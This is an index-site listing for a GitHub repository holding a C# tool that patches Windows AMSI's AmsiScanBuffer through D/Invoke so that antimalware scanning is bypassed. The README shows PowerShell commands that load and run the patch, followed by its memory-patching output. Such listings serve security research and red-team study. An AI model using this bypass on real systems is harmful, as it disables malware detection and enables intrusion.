Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/S3cur3Th1sSh1t/SyscallAmsiScanBufferBypass
AmsiScanBufferBypass using D/Invoke
https://github.com/S3cur3Th1sSh1t/SyscallAmsiScanBufferBypass
Last synced: 22 days ago
JSON representation
AmsiScanBufferBypass using D/Invoke
- Host: GitHub
- URL: https://github.com/S3cur3Th1sSh1t/SyscallAmsiScanBufferBypass
- Owner: S3cur3Th1sSh1t
- Created: 2021-05-19T14:06:00.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-06-17T14:06:04.000Z (over 3 years ago)
- Last Synced: 2024-11-18T17:09:06.372Z (25 days ago)
- Language: C#
- Size: 77.1 KB
- Stars: 129
- Watchers: 5
- Forks: 19
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
Awesome Lists containing this project
- awesome-hacking-lists - S3cur3Th1sSh1t/SyscallAmsiScanBufferBypass - AmsiScanBufferBypass using D/Invoke (C# #)
README
# SyscallAmsiScanBufferBypass
AmsiScanBuffer Patch using D/Invoke.
Credit goes to [RastaMouses original work](https://github.com/rasta-mouse/AmsiScanBufferBypass).
I was just using [TheWovers D/Invoke](https://thewover.github.io/Dynamic-Invoke/) to port the `P/Invoke` functions to `D/Invoke`.
### C#
Can be compiled to a DLL and loaded via reflection, or included in a larger .NET Assembly (e.g. [SharpSploit](https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/Evasion/Amsi.cs)).
```
PS > PS C:\temp> add-type -Path .\SyscallBypass.dll
PS > [Patch.bySyscall]::Patch()[>] Manually mapping kernel32.dll into current process memory
Successfully allocated memory!
Successfully wrote PE header
Successfully wrote section .text
Successfully wrote section .rdata
Successfully wrote section .data
Successfully wrote section .pdata
Successfully wrote section .rsrc
Successfully wrote section .reloc[>] Module Base : 24AFF3D0000
[>] Process Handle : 7FFF8DC60000
[>] Patch address : 7FFF8DC62420
[+] NtProtectVirtualMemory success, going to patch it now!
[>] Patching at address : 7FFF8DC62420
[+] NtProtectVirtualMemory set back to oldprotect!
```